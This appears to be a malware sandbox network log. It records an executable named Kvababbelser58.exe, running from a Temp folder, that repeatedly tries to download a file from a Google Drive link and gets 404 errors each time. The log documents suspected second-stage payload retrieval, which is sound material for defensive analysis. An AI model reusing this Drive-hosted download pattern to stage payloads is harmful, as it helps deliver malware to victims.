                                                                                                      30192.168.2.749999216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:34 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:35 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:35 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: script-src 'nonce-vAgWXGOqg7QUGjZJK6mLeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      31192.168.2.750000142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:35 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:36 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFiumC6yiVOmoJPcHaZ3zEhfW3E158_wGyfnx1NQ7tTaB25aPU9RXDYDTVjqbpayddFokWoB3pYcd6g
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:36 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-mhTIyIf-D2EniRLn6cC_lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:36 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 64 2d 34 57 65 45 7a 7a 61 69 76 65 4a 63 65 39 62 55 4b 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="md-4WeEzzaiveJce9bUKSw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      32192.168.2.750001216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:37 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:37 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:37 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-NxBVE6GcputAGuBlO5jKNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      33192.168.2.750002142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:38 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:38 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgStGGVEuaZxYHgxMkQVeshSF5YeyuWhLvxPkUtEz0hjSPV9rc-1n3NFYHYdbRb6APUy
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:38 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-7LxbZh3Vx_-zy7Qxp_Jieg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 49 62 32 49 41 37 4c 72 49 33 75 53 49 51 2d 45 6b 6d 6c 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RIb2IA7LrI3uSIQ-Ekml0A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      34192.168.2.750003216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:39 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:40 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:39 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-MYU6aePA0Gnz4aBVrplfAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      35192.168.2.750004142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:40 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:41 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgSE9w5OM9PRnkq2jF5FD20hLA9itqGpKhJCWFTgqREGHA-HMwkUyk8VYro5205aHhX-
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:40 GMT
                                                                                                      Content-Security-Policy: script-src 'nonce-Ug9YJVTGSzHQ48pgvEAAlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 4b 43 57 66 61 73 79 4c 74 31 47 4a 49 74 4b 63 2d 6c 43 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bKCWfasyLt1GJItKc-lC2A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      36192.168.2.750005216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:41 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:42 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:42 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-VEeeqPk0IPwpXap_KDYkbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      37192.168.2.750006142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:42 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:43 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTTRccEoQgGE4T4VtmxnaoUMcwoxRSyaoeR8C8CVXvqUOB0tFIG7Zsbbys0EH10SY_GzvF0Yi8
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:43 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
